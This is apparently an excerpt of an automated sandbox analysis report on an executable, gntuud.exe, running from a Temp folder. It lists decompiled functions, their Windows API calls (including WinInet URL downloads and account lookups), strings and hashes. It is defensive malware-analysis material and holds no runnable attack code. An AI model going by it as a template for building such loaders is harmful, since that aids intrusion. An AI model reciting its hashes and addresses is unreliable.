csm, xrefs: 00419C42
csm, xrefs: 00419CAF

Memory Dump Source

Source File: 00000008.00000002.384447242.0000000000400000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000008.00000002.384944936.000000000043E000.00000040.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_gntuud.jbxd

Yara matches

Similarity

API ID: ExceptionSpec$CallCatchFramesMatchNestedTypeUnexpectedUnwindtype_info::operator==
String ID: csm$csm$csm
API String ID: 4234981820-393685449
Opcode ID: 6a5e155c9986efd97b7d459fbe106e95df93c5a924db6e052d510ffac938e950
Instruction ID: 55aba353ce1f2b03f7557c62acf52ca59a8224d4baa2e58a88d4b1d7c662f595
Opcode Fuzzy Hash: 6a5e155c9986efd97b7d459fbe106e95df93c5a924db6e052d510ffac938e950
Instruction Fuzzy Hash: D9C18B71900209AFCF29DFA5C8919EEBBB5BF14314F04415BE815AB242D339DD92CF9A

Uniqueness

Uniqueness Score: -1.00%

Function 004236DF Relevance: 17.8, APIs: 9, Strings: 1, Instructions: 273COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 00423398: CreateFileW.KERNEL32(00000000,00000000,?,00423788,?,?,00000000,?,00423788,00000000,0000000C), ref: 004233B5

GetLastError.KERNEL32 ref: 004237F3
__dosmaperr.LIBCMT ref: 004237FA
GetFileType.KERNEL32(00000000), ref: 00423806
GetLastError.KERNEL32 ref: 00423810
__dosmaperr.LIBCMT ref: 00423819
CloseHandle.KERNEL32(00000000), ref: 00423839
CloseHandle.KERNEL32(0041E51E), ref: 00423986
GetLastError.KERNEL32 ref: 004239B8
__dosmaperr.LIBCMT ref: 004239BF

Strings

H, xrefs: 00423944

Memory Dump Source

Source File: 00000008.00000002.384447242.0000000000400000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000008.00000002.384944936.000000000043E000.00000040.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_gntuud.jbxd

Yara matches

Similarity

API ID: ErrorLast__dosmaperr$CloseFileHandle$CreateType
String ID: H
API String ID: 4237864984-2852464175
Opcode ID: 1ce13e6fd8c28752e2ddd2a23a2d287ae7b2b8bd4a2202f9c8fd90ddaa5a1295
Instruction ID: b003a15c628702d40cfbcecca9f7353160345fca733c1857a0ba88a793590157
Opcode Fuzzy Hash: 1ce13e6fd8c28752e2ddd2a23a2d287ae7b2b8bd4a2202f9c8fd90ddaa5a1295
Instruction Fuzzy Hash: 5DA12772B001548FCF19EF68EC917AE3BB0AB46315F54016EE811AF391C73C9956CB59

Uniqueness

Uniqueness Score: -1.00%

Function 0041EE5A Relevance: 15.1, APIs: 10, Instructions: 70COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 0041EE70

Part of subcall function 0041E681: HeapFree.KERNEL32(00000000,00000000,?,0042245F,?,00000000,?,?,?,00422486,?,00000007,?,?,00422888,?), ref: 0041E697
Part of subcall function 0041E681: GetLastError.KERNEL32(?,?,0042245F,?,00000000,?,?,?,00422486,?,00000007,?,?,00422888,?,?), ref: 0041E6A9

_free.LIBCMT ref: 0041EE7C
_free.LIBCMT ref: 0041EE87
_free.LIBCMT ref: 0041EE92
_free.LIBCMT ref: 0041EE9D
_free.LIBCMT ref: 0041EEA8
_free.LIBCMT ref: 0041EEB3
_free.LIBCMT ref: 0041EEBE
_free.LIBCMT ref: 0041EEC9
_free.LIBCMT ref: 0041EED7

Memory Dump Source

Source File: 00000008.00000002.384447242.0000000000400000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000008.00000002.384944936.000000000043E000.00000040.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_gntuud.jbxd

Yara matches

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: f30e698eb1c1ff19beb48a09c14b1ed35e428e17ffab047da0a82443fd473b72
Instruction ID: 06351b20bf99703dcd7bf9b8d39c0ae7e0177a32b915429fb414c1ff2a1cc787
Opcode Fuzzy Hash: f30e698eb1c1ff19beb48a09c14b1ed35e428e17ffab047da0a82443fd473b72
Instruction Fuzzy Hash: 4321EABA940208EFCF41EF96C841CDE7BB8AF18344B81416AF9159B121EB35DA95CB84

Uniqueness

Uniqueness Score: -1.00%

Function 0096F0C1 Relevance: 15.1, APIs: 10, Instructions: 69COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 0096F0D7

Part of subcall function 0096E8E8: HeapFree.KERNEL32(00000000,00000000,?,009726C6,?,00000000,?,?,?,009726ED,?,00000007,?,?,00972AEF,?), ref: 0096E8FE
Part of subcall function 0096E8E8: GetLastError.KERNEL32(?,?,009726C6,?,00000000,?,?,?,009726ED,?,00000007,?,?,00972AEF,?,?), ref: 0096E910

_free.LIBCMT ref: 0096F0E3
_free.LIBCMT ref: 0096F0EE
_free.LIBCMT ref: 0096F0F9
_free.LIBCMT ref: 0096F104
_free.LIBCMT ref: 0096F10F
_free.LIBCMT ref: 0096F11A
_free.LIBCMT ref: 0096F125
_free.LIBCMT ref: 0096F130
_free.LIBCMT ref: 0096F13E

Memory Dump Source

Source File: 00000008.00000002.385428058.0000000000950000.00000040.00001000.00020000.00000000.sdmp, Offset: 00950000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_950000_gntuud.jbxd

Yara matches

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: 319d3990c105e5385206965719a395ca335ef1808df55c023be15a30ffd47ec3
Instruction ID: e965290a3ecf00389539a7b271d3bad52058d4d2c1c2301fd0def6ab2f566ddb
Opcode Fuzzy Hash: 319d3990c105e5385206965719a395ca335ef1808df55c023be15a30ffd47ec3
Instruction Fuzzy Hash: 1021797A900108AFDB41EFA4C881EDE7BB9FF48340F8585A6F515AB121DB31EA54DB80

Uniqueness

Uniqueness Score: -1.00%

Function 00427D13 Relevance: 14.1, APIs: 1, Strings: 7, Instructions: 147COMMON

Download Yara Rule

APIs

DecodePointer.KERNEL32(?,?,?,?,?,?,?,?,?,0042767F), ref: 00427D2C

Strings

log, xrefs: 00427D89, 00427D98
exp, xrefs: 00427DAB, 00427E10
pow, xrefs: 00427DCA, 00427E74, 00427EC1
log10, xrefs: 00427D6E, 00427D7D
acos, xrefs: 00427E62
sqrt, xrefs: 00427E6B
asin, xrefs: 00427E59

Memory Dump Source

Source File: 00000008.00000002.384447242.0000000000400000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000008.00000002.384944936.000000000043E000.00000040.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_gntuud.jbxd

Yara matches

Similarity

API ID: DecodePointer
String ID: acos$asin$exp$log$log10$pow$sqrt
API String ID: 3527080286-3064271455
Opcode ID: 43d1fcc8e3c27067cf0fe46aebf70cd92f7bd8f29e8a0d1e94542de1873b69ac
Instruction ID: 06daac8c886ad40bfc3f5fc7b7f7e77c663449c06db021f2b6458f19738d1afc
Opcode Fuzzy Hash: 43d1fcc8e3c27067cf0fe46aebf70cd92f7bd8f29e8a0d1e94542de1873b69ac
Instruction Fuzzy Hash: 12517170A0852ACBCF149F58F9481AEBFB0FF49305F924096E441A7264C77C9D5A8B6D

Uniqueness

Uniqueness Score: -1.00%

Function 009768D9 Relevance: 13.8, APIs: 9, Instructions: 301COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.385428058.0000000000950000.00000040.00001000.00020000.00000000.sdmp, Offset: 00950000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_950000_gntuud.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0b607198fc18c4977b59bfda8267b468835187ce52ba6938479eef1a471207c7
Instruction ID: 695c135c883edefd4ba4ca54e5bdfb30f2d87a08687ecf6398ebfa07137174cd
Opcode Fuzzy Hash: 0b607198fc18c4977b59bfda8267b468835187ce52ba6938479eef1a471207c7
Instruction Fuzzy Hash: 58C105B2E046499FDF15DF99C881BBDBBB4EF89300F048169F688A7392C7349941CB65

Uniqueness

Uniqueness Score: -1.00%

Function 00426672 Relevance: 13.8, APIs: 9, Instructions: 301COMMONLIBRARYCODE

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.384447242.0000000000400000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000008.00000002.384944936.000000000043E000.00000040.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_gntuud.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 11743b40c01e3959784268cd5079b5cfeda78e420ac9c0762f079648b26ee728
Instruction ID: c3b722db2c5acca593ef2b985c6e8c5028b49e802bec8f04f8f593b2d7ca9a6e
Opcode Fuzzy Hash: 11743b40c01e3959784268cd5079b5cfeda78e420ac9c0762f079648b26ee728
Instruction Fuzzy Hash: 9EC1F7B0F042559FDF11DF99E880BAE7BB0BF49304F91405BE941A7392C7789982CB69

Uniqueness

Uniqueness Score: -1.00%

Function 00421B09 Relevance: 12.2, APIs: 8, Instructions: 203COMMON

Download Yara Rule

APIs

___from_strstr_to_strchr.LIBCMT ref: 00421B33
_free.LIBCMT ref: 00421C0C
_free.LIBCMT ref: 00421C39

Memory Dump Source

Source File: 00000008.00000002.384447242.0000000000400000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000008.00000002.384944936.000000000043E000.00000040.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_gntuud.jbxd

Yara matches

Similarity

API ID: _free$___from_strstr_to_strchr
String ID:
API String ID: 3409252457-0
Opcode ID: 03f36e046b91981e3c1c6dd44dd11d7b0534c91b7869a7ac2354f936c8b3a0a3
Instruction ID: 5262ae90983e57a577d1a6d47923df6c9a1a1cc28a3224689016cc5a84fe2567
Opcode Fuzzy Hash: 03f36e046b91981e3c1c6dd44dd11d7b0534c91b7869a7ac2354f936c8b3a0a3
Instruction Fuzzy Hash: 5F517E70F40324EFEB10AF76A88199E7BB4AF21314F94406FE91097262EE3D9941CB4D

Uniqueness

Uniqueness Score: -1.00%

Function 00953A37 Relevance: 10.7, APIs: 7, Instructions: 210memoryCOMMON

Download Yara Rule

APIs

RtlAllocateHeap.NTDLL(00000000), ref: 00953AA1
LookupAccountNameW.ADVAPI32(00000000,?,00000000,?,00000000,?,?), ref: 00953AD2
RtlAllocateHeap.NTDLL(00000000), ref: 00953AE0
RtlAllocateHeap.NTDLL(00000000), ref: 00953AF3
LookupAccountNameW.ADVAPI32(00000000,?,00000000,?,00000000,?,?), ref: 00953B1D
ConvertSidToStringSidW.ADVAPI32(00000000,00000000), ref: 00953B30
LocalFree.KERNEL32(00000000), ref: 00953C4C

Memory Dump Source

Source File: 00000008.00000002.385428058.0000000000950000.00000040.00001000.00020000.00000000.sdmp, Offset: 00950000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_950000_gntuud.jbxd

Yara matches

Similarity

API ID: AllocateHeap$AccountLookupName$ConvertFreeLocalString
String ID:
API String ID: 856199767-0
Opcode ID: e592beb6ddb58f0755ff5d118e395410ab74721bc032d0bb8e1f808109db77ce
Instruction ID: 3e0b14f8d8819acc0aed4d999d690aec498d90aae4d8d45e972bd822ce8ccb24
Opcode Fuzzy Hash: e592beb6ddb58f0755ff5d118e395410ab74721bc032d0bb8e1f808109db77ce
Instruction Fuzzy Hash: D6717FB1E00209AFDB14DFA5DC85FBFBBB9EF48341F408529E905A7241DB359909CB64

Uniqueness

Uniqueness Score: -1.00%

Function 004041F0 Relevance: 10.7, APIs: 7, Instructions: 165networkfileCOMMON

Download Yara Rule

APIs

InternetOpenW.WININET(00434EFC,00000000,00000000,00000000,00000000), ref: 004042CC
InternetOpenUrlW.WININET(00000000,?,00000000,00000000,00000000,00000000), ref: 004042DE
InternetReadFile.WININET(00000000,2F6E538A,03E80000,03E80000), ref: 004042F1
InternetCloseHandle.WININET(00000000), ref: 00404302
InternetCloseHandle.WININET(00000000), ref: 00404305
InternetCloseHandle.WININET(00000000), ref: 00404313
InternetCloseHandle.WININET(00000000), ref: 00404316

Memory Dump Source

Source File: 00000008.00000002.384447242.0000000000400000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000008.00000002.384944936.000000000043E000.00000040.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_gntuud.jbxd

Yara matches

Similarity

API ID: Internet$CloseHandle$Open$FileRead
String ID:
API String ID: 4294395943-0
Opcode ID: 8395a66500458d0487bad4bbdefcd728457b01d8b9aacd34fc5206d26ed1c58e
Instruction ID: d4460e6594f183dd8fbd5c6a35e334755fb906af117da0c2693caa719dd5e9b3
Opcode Fuzzy Hash: 8395a66500458d0487bad4bbdefcd728457b01d8b9aacd34fc5206d26ed1c58e
Instruction Fuzzy Hash: 1D51C571F00108ABDB14DFA4CC41BEEBB75EF89300F60852EE911B7290D7399945CBA8

Uniqueness

Uniqueness Score: -1.00%

Function 004195B0 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 122COMMON

Download Yara Rule

APIs

_ValidateLocalCookies.LIBCMT ref: 004195E7
___except_validate_context_record.LIBVCRUNTIME ref: 004195EF
_ValidateLocalCookies.LIBCMT ref: 00419678
__IsNonwritableInCurrentImage.LIBCMT ref: 004196A3
_ValidateLocalCookies.LIBCMT ref: 004196F8

Strings

csm, xrefs: 0041968D

Memory Dump Source

Source File: 00000008.00000002.384447242.0000000000400000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000008.00000002.384944936.000000000043E000.00000040.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_gntuud.jbxd

Yara matches

Similarity

API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
String ID: csm
API String ID: 1170836740-1018135373
Opcode ID: 6828d5380a72ecfa71335a635a27c0c7d09dca2ea54c9a1ae805d57ddbe0929f
Instruction ID: 5178301fb53efe35cb3bc6ec9000bbd01032083e63e087f95639f1ef71daa0d4
Opcode Fuzzy Hash: 6828d5380a72ecfa71335a635a27c0c7d09dca2ea54c9a1ae805d57ddbe0929f
Instruction Fuzzy Hash: 8A41EA34A00218ABCF10DF69C894ADE7BB1BF45328F14816BE8145B352D739DE95CBA9

Uniqueness

Uniqueness Score: -1.00%

Function 0041F22E Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 77COMMONLIBRARYCODE

Download Yara Rule

Strings

ext-ms-, xrefs: 0041F299
api-ms-, xrefs: 0041F285

Memory Dump Source

Source File: 00000008.00000002.384447242.0000000000400000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000008.00000002.384944936.000000000043E000.00000040.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_gntuud.jbxd

Yara matches

Similarity

API ID:
String ID: api-ms-$ext-ms-
API String ID: 0-537541572
Opcode ID: d4fe4988d1e008e1d7e07dcec31a112dd2843d1347c14ae552424f50b02a7110
Instruction ID: d7f8f66c5accd2a474fa2c9e550e026180df2d9793049625905f73b7f49e49c8
Opcode Fuzzy Hash: d4fe4988d1e008e1d7e07dcec31a112dd2843d1347c14ae552424f50b02a7110
Instruction Fuzzy Hash: 16212E79A01210EBCB3197649C40AEB37689B05760F610273ED06E73D1D639ED4B85DC

Uniqueness

Uniqueness Score: -1.00%

Function 009726D4 Relevance: 10.6, APIs: 7, Instructions: 65COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 0097269C: _free.LIBCMT ref: 009726C1

_free.LIBCMT ref: 00972722

Part of subcall function 0096E8E8: HeapFree.KERNEL32(00000000,00000000,?,009726C6,?,00000000,?,?,?,009726ED,?,00000007,?,?,00972AEF,?), ref: 0096E8FE
Part of subcall function 0096E8E8: GetLastError.KERNEL32(?,?,009726C6,?,00000000,?,?,?,009726ED,?,00000007,?,?,00972AEF,?,?), ref: 0096E910

_free.LIBCMT ref: 0097272D
_free.LIBCMT ref: 00972738
_free.LIBCMT ref: 0097278C
_free.LIBCMT ref: 00972797
_free.LIBCMT ref: 009727A2
_free.LIBCMT ref: 009727AD

Memory Dump Source

Source File: 00000008.00000002.385428058.0000000000950000.00000040.00001000.00020000.00000000.sdmp, Offset: 00950000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_950000_gntuud.jbxd

Yara matches

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: 2de8991c6391308a96b103f83ccd72a3c81e24415d01b5e1f5153397f2b628c1
Instruction ID: b6145ad136abecd8e7b416efbef7e5a8e81f4cdaebf67624c131837644bd5df0
Opcode Fuzzy Hash: 2de8991c6391308a96b103f83ccd72a3c81e24415d01b5e1f5153397f2b628c1
Instruction Fuzzy Hash: 6911F1B2554B04ABE720B7B0DD47FCB779C9F88700F84882BB2DD66152DA75B5045B90

Uniqueness

Uniqueness Score: -1.00%

Function 0042246D Relevance: 10.6, APIs: 7, Instructions: 65COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 00422435: _free.LIBCMT ref: 0042245A

_free.LIBCMT ref: 004224BB

Part of subcall function 0041E681: HeapFree.KERNEL32(00000000,00000000,?,0042245F,?,00000000,?,?,?,00422486,?,00000007,?,?,00422888,?), ref: 0041E697
Part of subcall function 0041E681: GetLastError.KERNEL32(?,?,0042245F,?,00000000,?,?,?,00422486,?,00000007,?,?,00422888,?,?), ref: 0041E6A9

_free.LIBCMT ref: 004224C6
_free.LIBCMT ref: 004224D1
_free.LIBCMT ref: 00422525
_free.LIBCMT ref: 00422530
_free.LIBCMT ref: 0042253B
_free.LIBCMT ref: 00422546

Memory Dump Source

Source File: 00000008.00000002.384447242.0000000000400000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000008.00000002.384944936.000000000043E000.00000040.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_gntuud.jbxd

Yara matches

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: 2de8991c6391308a96b103f83ccd72a3c81e24415d01b5e1f5153397f2b628c1
Instruction ID: 58f4e587e69a32dac6c23b689706d054278821061d6879d412644195358b7cbe
Opcode Fuzzy Hash: 2de8991c6391308a96b103f83ccd72a3c81e24415d01b5e1f5153397f2b628c1
Instruction Fuzzy Hash: 7911B431A40B18FAD920BFB2DD47FCBB7DC5F08304FC0481EB699A6052D6ACB5514648

Uniqueness

Uniqueness Score: -1.00%

Function 00973D8F Relevance: 9.3, APIs: 6, Instructions: 318fileCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetConsoleCP.KERNEL32(?,00955B07,00000000), ref: 00973DD7
__fassign.LIBCMT ref: 00973FB6
__fassign.LIBCMT ref: 00973FD3
WriteFile.KERNEL32(?,00955B07,00000000,?,00000000,?,?,?,?,?,?,?,?,?,?,00000000), ref: 0097401B
WriteFile.KERNEL32(?,?,00000001,?,00000000), ref: 0097405B
GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,00000000), ref: 00974107

Memory Dump Source

Source File: 00000008.00000002.385428058.0000000000950000.00000040.00001000.00020000.00000000.sdmp, Offset: 00950000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_950000_gntuud.jbxd

Yara matches

Similarity

API ID: FileWrite__fassign$ConsoleErrorLast
String ID:
API String ID: 4031098158-0
Opcode ID: 7d55223bb09163640f0d9bf16a928e29f032f295346b8fdeb5be4f5065d50545
Instruction ID: 41401f38a3501940db52807d9993199ff0567a55d09a36b2996e692323fe2fd5
Opcode Fuzzy Hash: 7d55223bb09163640f0d9bf16a928e29f032f295346b8fdeb5be4f5065d50545
Instruction Fuzzy Hash: 99D1AF72D002589FCF15CFA8C8809EDBBB5BF48314F24816AE959F7242D731AE46CB54

Uniqueness

Uniqueness Score: -1.00%

Function 00423B28 Relevance: 9.3, APIs: 6, Instructions: 318fileCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetConsoleCP.KERNEL32(?,004058A0,00000000), ref: 00423B70
__fassign.LIBCMT ref: 00423D4F
__fassign.LIBCMT ref: 00423D6C
WriteFile.KERNEL32(?,004058A0,00000000,?,00000000,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00423DB4
WriteFile.KERNEL32(?,?,00000001,?,00000000), ref: 00423DF4
GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,00000000), ref: 00423EA0

Memory Dump Source

Source File: 00000008.00000002.384447242.0000000000400000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000008.00000002.384944936.000000000043E000.00000040.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_gntuud.jbxd

Yara matches

Similarity

API ID: FileWrite__fassign$ConsoleErrorLast
String ID:
API String ID: 4031098158-0
Opcode ID: 398e7761831c6a10ae857aa9721353ed2b132615db7f716761bb2a6aa914b76f
Instruction ID: a467c14f7ebf387d8f292150a90acf63a4f3dd59af87892f088fdbcdb0a48f83
Opcode Fuzzy Hash: 398e7761831c6a10ae857aa9721353ed2b132615db7f716761bb2a6aa914b76f
Instruction Fuzzy Hash: 72D19F71E002689FCF15CFA8D8809EDBBB5BF49314F64016AE855B7342D738AE46CB58

Uniqueness

Uniqueness Score: -1.00%

Function 00969B37 Relevance: 9.1, APIs: 6, Instructions: 60COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLastError.KERNEL32(?,?,00969B2E,0096971E,00968F63), ref: 00969B45
___vcrt_FlsGetValue.LIBVCRUNTIME ref: 00969B53
___vcrt_FlsSetValue.LIBVCRUNTIME ref: 00969B6C
SetLastError.KERNEL32(00000000,00969B2E,0096971E,00968F63), ref: 00969BBE

Memory Dump Source

Source File: 00000008.00000002.385428058.0000000000950000.00000040.00001000.00020000.00000000.sdmp, Offset: 00950000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_950000_gntuud.jbxd

Yara matches

Similarity

API ID: ErrorLastValue___vcrt_
String ID:
API String ID: 3852720340-0
Opcode ID: 0f6e51aa0c255468b6a622d8c735b9b5b069fdda8c7ed9770d7dbe64c9198e0d
Instruction ID: 0cec0abca7ae3d6829993ac75bf83a065821c4b1375d5a511e416b83cc63e8ea
Opcode Fuzzy Hash: 0f6e51aa0c255468b6a622d8c735b9b5b069fdda8c7ed9770d7dbe64c9198e0d
Instruction Fuzzy Hash: F80126736097115EE72C27B5BD85B2A2BBCEB45772730033AF511940F5EFA54C01EA48

Uniqueness

Uniqueness Score: -1.00%

Function 004198D0 Relevance: 9.1, APIs: 6, Instructions: 60COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLastError.KERNEL32(?,?,004198C7,004194B7,00418CFC), ref: 004198DE
___vcrt_FlsGetValue.LIBVCRUNTIME ref: 004198EC
___vcrt_FlsSetValue.LIBVCRUNTIME ref: 00419905
SetLastError.KERNEL32(00000000,004198C7,004194B7,00418CFC), ref: 00419957

Memory Dump Source

Source File: 00000008.00000002.384447242.0000000000400000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000008.00000002.384944936.000000000043E000.00000040.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_gntuud.jbxd

Yara matches

Similarity

API ID: ErrorLastValue___vcrt_
String ID:
API String ID: 3852720340-0
Opcode ID: 0f6e51aa0c255468b6a622d8c735b9b5b069fdda8c7ed9770d7dbe64c9198e0d
Instruction ID: dfdc178befc3424474c629a448357edf8bf4b92ab251d18c35ab581d65446efd
Opcode Fuzzy Hash: 0f6e51aa0c255468b6a622d8c735b9b5b069fdda8c7ed9770d7dbe64c9198e0d
Instruction Fuzzy Hash: 7101F5726193115EE6282676BD959E72774EB05778320023FF210852E0EB590C85D58D

Uniqueness

Uniqueness Score: -1.00%

Function 009712C5 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 83COMMON

Download Yara Rule

Strings

C:\Users\user\AppData\Local\Temp\9c69749b54\gntuud.exe, xrefs: 009712CA

Memory Dump Source

Source File: 00000008.00000002.385428058.0000000000950000.00000040.00001000.00020000.00000000.sdmp, Offset: 00950000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_950000_gntuud.jbxd

Yara matches

Similarity

API ID:
String ID: C:\Users\user\AppData\Local\Temp\9c69749b54\gntuud.exe
API String ID: 0-628885649
Opcode ID: bfd5d46c515e17014f1bd1f1bc140eecf9bc539adaec1f5199e9c11f98db3bd1
Instruction ID: fa9c1c174a8810c45dd339dc86fbf0b4bf0685594a4dd6b4f631d307b36f47c7
Opcode Fuzzy Hash: bfd5d46c515e17014f1bd1f1bc140eecf9bc539adaec1f5199e9c11f98db3bd1
Instruction Fuzzy Hash: A921F3B2600209AFDB20AFA98C81E3B77ADEF80365710C625F968D7551E734EC0087B0

Uniqueness

Uniqueness Score: -1.00%

Function 0042105E Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 83COMMON

Download Yara Rule

Strings

C:\Users\user\AppData\Local\Temp\9c69749b54\gntuud.exe, xrefs: 00421063

Memory Dump Source

Source File: 00000008.00000002.384447242.0000000000400000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000008.00000002.384944936.000000000043E000.00000040.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_gntuud.jbxd

Yara matches

Similarity

API ID:
String ID: C:\Users\user\AppData\Local\Temp\9c69749b54\gntuud.exe
API String ID: 0-628885649
Opcode ID: 87dee6722e1b6ccd551237ea2535ba9f7b479b31bc556fd5bfd9a7fcbd75ff9b
Instruction ID: d9f0d1edbe79c721972c5de009bde6595bd14974265b531d28add2f36aac6c1f
Opcode Fuzzy Hash: 87dee6722e1b6ccd551237ea2535ba9f7b479b31bc556fd5bfd9a7fcbd75ff9b
Instruction Fuzzy Hash: 1021F871700125AFDB20AF62ACC186B776CEF14368790452BF91593261DB38EC9187A8

Uniqueness

Uniqueness Score: -1.00%

Function 0041C4B6 Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 74COMMON

Download Yara Rule

APIs

_wcsrchr.LIBVCRUNTIME ref: 0041C4F8

Strings

.exe, xrefs: 0041C505
.com, xrefs: 0041C538
.cmd, xrefs: 0041C516
.bat, xrefs: 0041C527

Memory Dump Source

Source File: 00000008.00000002.384447242.0000000000400000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000008.00000002.384944936.000000000043E000.00000040.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_gntuud.jbxd

Yara matches

Similarity

API ID: _wcsrchr
String ID: .bat$.cmd$.com$.exe
API String ID: 1752292252-4019086052
Opcode ID: 570c69b01f606cfad589b38b12c5c8273c60fca63bd2e970eee5f9d36b6f2e4e
Instruction ID: 010fe26d956af5bd087513acdd8c981cfa3e4b5d319970c9fb4408be828d902b
Opcode Fuzzy Hash: 570c69b01f606cfad589b38b12c5c8273c60fca63bd2e970eee5f9d36b6f2e4e
Instruction Fuzzy Hash: 0D01E537684636352614211AAC427B717A99BDABB4B25012FFC44F72C1FE8CEC8251DC

Uniqueness

Uniqueness Score: -1.00%

Function 0041A977 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 68COMMONLIBRARYCODE

Download Yara Rule

Strings

api-ms-, xrefs: 0041A9C7

Memory Dump Source

Source File: 00000008.00000002.384447242.0000000000400000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000008.00000002.384944936.000000000043E000.00000040.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_gntuud.jbxd

Yara matches

Similarity

API ID:
String ID: api-ms-
API String ID: 0-2084034818
Opcode ID: 320331af6566cb962ace0647e76be2ad38b69705adbc3407a77f9eddf13dbea2
Instruction ID: cadd73a2a830a1b03fc792233cfe60f62a5f785435c8c8d28cbd2197b084f308
Opcode Fuzzy Hash: 320331af6566cb962ace0647e76be2ad38b69705adbc3407a77f9eddf13dbea2
Instruction Fuzzy Hash: A311DA71B12221EBC7324B249D44AAB77649F017E4B510533EE05A7391D738DDE1C6DE

Uniqueness

Uniqueness Score: -1.00%

Function 0041BA23 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 30libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,0041BA18,0041F030,?,0041B9E0,0041BF66,?,0041F030), ref: 0041BA38
GetProcAddress.KERNEL32(00000000,CorExitProcess,00000000,?,?,0041BA18,0041F030,?,0041B9E0,0041BF66,?,0041F030), ref: 0041BA4B
FreeLibrary.KERNEL32(00000000,?,?,0041BA18,0041F030,?,0041B9E0,0041BF66,?,0041F030), ref: 0041BA6E

Strings

CorExitProcess, xrefs: 0041BA43
mscoree.dll, xrefs: 0041BA31

Memory Dump Source

